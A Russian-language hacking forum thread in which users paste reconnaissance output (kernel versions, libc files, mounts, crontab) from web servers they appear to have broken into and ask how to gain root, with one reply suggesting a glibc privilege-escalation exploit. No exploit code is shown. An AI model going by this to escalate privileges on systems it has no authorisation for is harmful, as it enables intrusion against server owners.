/usr/local/vservers/users/home on /usr/local/www/htdocs/users type none (bind)

/usr/local/vservers/mysql/usr/local/mysql on /usr/local/mysql type none (bind,ro)

/usr/local/vservers/postgres/usr/local/postgresql on /usr/local/postgresql type none (bind,ro

$ df -h

Filesystem Size Used Avail Use% Mounted on

/dev/hdv1 45G 26G 17G 60% /

none 400M 27M 374M 7% /tmp

я так понял это виртуалка ip 10.0.0.2

первый раз с этим сталкиваюсь

можно мне чем помочь?


спасибо

Expl0ited 15.10.2011 02:27

Цитата:

Сообщение от vasykas
vasykas said:
uname -a
Linux apache 2.6.32-vs2.3.0.36.27-smp #2 SMP Sat Mar 27 19:11:22 CET 2010 i686
$ ls -la --full-time /lib/libc*
-rwxr-xr-x 1 root root 1570593 2008-11-21 08:33:31.000000000 +0100 /lib/libc-2.7.so
lrwxrwxrwx 1 root root 11 2009-12-24 11:41:48.000000000 +0100 /lib/libc.so.6 -> libc-2.7.so
-rwxr-xr-x 1 root root 190689 2008-11-21 08:33:31.000000000 +0100 /lib/libcidn-2.7.so
lrwxrwxrwx 1 root root 14 2009-12-24 11:41:47.000000000 +0100 /lib/libcidn.so.1 -> libcidn-2.7.so
lrwxrwxrwx 1 root root 17 2009-12-24 11:41:47.000000000 +0100 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root 5744 2007-01-25 05:25:50.000000000 +0100 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root 42592 2008-11-21 08:33:31.000000000 +0100 /lib/libcrypt-2.7.so
lrwxrwxrwx 1 root root 15 2009-12-24 11:41:48.000000000 +0100 /lib/libcrypt.so.1 -> libcrypt-2.7.so
$ mount
/dev/hdv1 on / type ufs (defaults)
none on /proc type proc (defaults)
none on /tmp type tmpfs (size=400m,mode=1777)
none on /dev/pts type devpts (gid=5,mode=620)
/usr/local/vservers/users/home on /usr/local/www/htdocs/users type none (bind)
/usr/local/vservers/mysql/usr/local/mysql on /usr/local/mysql type none (bind,ro)
/usr/local/vservers/postgres/usr/local/postgresql on /usr/local/postgresql type none (bind,ro
$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/hdv1 45G 26G 17G 60% /
none 400M 27M 374M 7% /tmp
я так понял это виртуалка ip 10.0.0.2

первый раз с этим сталкиваюсь

можно мне чем помочь?

спасибо

ls -la /boot

и попробуй glibc

vasykas 15.10.2011 02:42

Цитата:

Сообщение от Expl0ited
Expl0ited said:
ls -la /boot
и попробуй glibc

boot пустой

glibc не кататит

я говорю там айпишник 10.0.0.2

whois'ом не пробивает

не пойму че за мини хост какой то

Expl0ited 15.10.2011 03:12

Цитата:

Сообщение от vasykas
vasykas said:
boot пустой
glibc не кататит
я говорю там айпишник 10.0.0.2
whois'ом не пробивает
не пойму че за мини хост какой то

Это виртуалка. А то что айпи 10.0.0.2, это обозначает что он внутри сети, и доступ к нему осуществляется скорее всего через прокси сервер, или же он просто за натом.

er9j6@ 15.10.2011 17:06

Как получить root? Сам подобрать не смог.

/usr/bin/gcc

/usr/bin/c++

/usr/bin/netstat

$ uname -a

FreeBSD 6.3-STABLE FreeBSD 6.3-STABLE #6: Sat Dec 19 06:26:37 CET 2009 root@:/root/src/sys/i386/compile/ISPSYSTEM_PAE i386

$ ls -la /boot

total 1688

drwxr-xr-x 10 root wheel 512 Apr 22 10:31 .

drwxr-xr-x 36 root wheel 512 Apr 22 10:45 ..

-r--r--r-- 1 root wheel 7638 Jul 10 2008 beastie.4th

-r--r--r-- 1 root wheel 8192 Jul 10 2008 boot

-r--r--r-- 1 root wheel 512 Jul 10 2008 boot0

-r--r--r-- 1 root wheel 512 Jul 10 2008 boot0sio

-r--r--r-- 1 root wheel 512 Jul 10 2008 boot1

-r--r--r-- 1 root wheel 7680 Jul 10 2008 boot2

-r--r--r-- 1 root wheel 1201 Jul 10 2008 cdboot

drwxr-xr-x 4 root wheel 512 Apr 22 10:31 defaults

-r--r--r-- 1 root wheel 1741 Nov 3 2005 device.hints

-r--r--r-- 1 root wheel 2249 Jul 10 2008 frames.4th

-r--r--r-- 1 root wheel 7975 Jul 10 2008 gptboot

drwxr-xr-x 4 root wheel 512 Apr 22 10:31 kernel

-r-xr-xr-x 1 root wheel 217088 Jul 10 2008 loader

-r--r--r-- 1 root wheel 7772 Jul 10 2008 loader.4th

-r--r--r-- 1 root wheel 15219 Jul 10 2008 loader.help

-r-xr-xr-x 1 root wheel 217088 Jan 21 2008 loader.old

-r--r--r-- 1 root wheel 389 Nov 3 2005 loader.rc

-r--r--r-- 1 root wheel 512 Jul 10 2008 mbr

drwxr-xr-x 4 root wheel 512 Apr 22 10:31 modules

-r--r--r-- 1 root wheel 512 Jul 10 2008 pmbr

-r--r--r-- 1 root wheel 219136 Jul 10 2008 pxeboot

-r--r--r-- 1 root wheel 692 Jul 10 2008 screen.4th

-r--r--r-- 1 root wheel 36440 Jul 10 2008 support.4th

$ mount

/dev/vd0 on / (vdsfs, local, with quotas, noclusterw)

$ df -h

Filesystem Size Used Avail Capacity Mounted on

/dev/vd0 20G 2.7G 17G 14% /

$ cat /etc/crontab

# /etc/crontab - root's crontab for FreeBSD

#

# $FreeBSD: src/etc/crontab,v 1.32 2002/11/22 16:13:39 tom Exp $

#

SHELL=/bin/sh

PATH=/etc:/bin:/sbin:/usr/bin:/usr/sbin

HOME=/var/log

#

#minute hour mday month wday who command

#

*/5 * * * * root /usr/libexec/atrun

#

# Save some entropy so that /dev/random can re-seed on boot.

*/11 * * * * operator /usr/libexec/save-entropy

#

# Rotate log files every hour, if necessary.

0 * * * * root newsyslog

#

# Perform daily/weekly/monthly maintenance.

1 3 * * * root periodic daily

15 4 * * 6 root periodic weekly

30 5 1 * * root periodic monthly

#

# Adjust the time zone if the CMOS clock keeps local time, as opposed to

# UTC time. See adjkerntz(8) for details.

#1,31 0-5 * * * root adjkerntz -a

$ pwd

/home/uchet/data/www/kye.ru/img


Время: 00:09